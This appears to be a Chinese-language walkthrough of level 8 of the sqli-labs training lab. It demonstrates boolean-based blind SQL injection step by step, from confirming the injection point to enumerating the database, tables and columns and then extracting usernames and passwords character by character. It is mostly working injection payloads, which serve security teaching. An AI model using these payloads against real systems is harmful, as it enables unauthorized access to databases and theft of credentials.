sqli-labs-master第八关

1、寻找注入点

1’ and 1=1--+

1’ and 1=2--+

页面显示 You are in..... Use outfile......无回显位判断为布尔盲注

2、注入数据库

爆破库长

?id=1' and (length(database()))>7 --+

根据库名长度爆库名

?id=1' and ascii(substr(database(),1,1))=115 --+

标蓝部分的为1到8（库名长度）

3. 爆数据表数量

?id=1' and (select COUNT(table_name) from information_schema.tables where table_schema=database())>2 --+

4.爆数据表名长度

?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>2--+

5.根据表名长度爆表名

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97--+

表一的第一个字段为e

表二的第一个字段为r

表三和四的第一个字段为u可能为users表重点关注最后发现表四是users表

6.根据users表爆数据列数量

?id=1' and (select COUNT(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3--+

Users中有三个字段

7.爆数据列名长度

?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))>2--+

8.根据列名长度爆列名

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))>97--+

?id=1' and substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1)=’a’ --+

最终得到users的三个字段名id，username，password

9.根据列名爆数据值

获取用户名和密码信息

?id=1' and ascii(substr(( select username from users limit 0,1),1,1))>97--+

?id=1' and ascii(substr(( select password from users limit 0,1),1,1))>97--+

?id=1' and substr((select username from users limit 0,1),1,1)='D'--+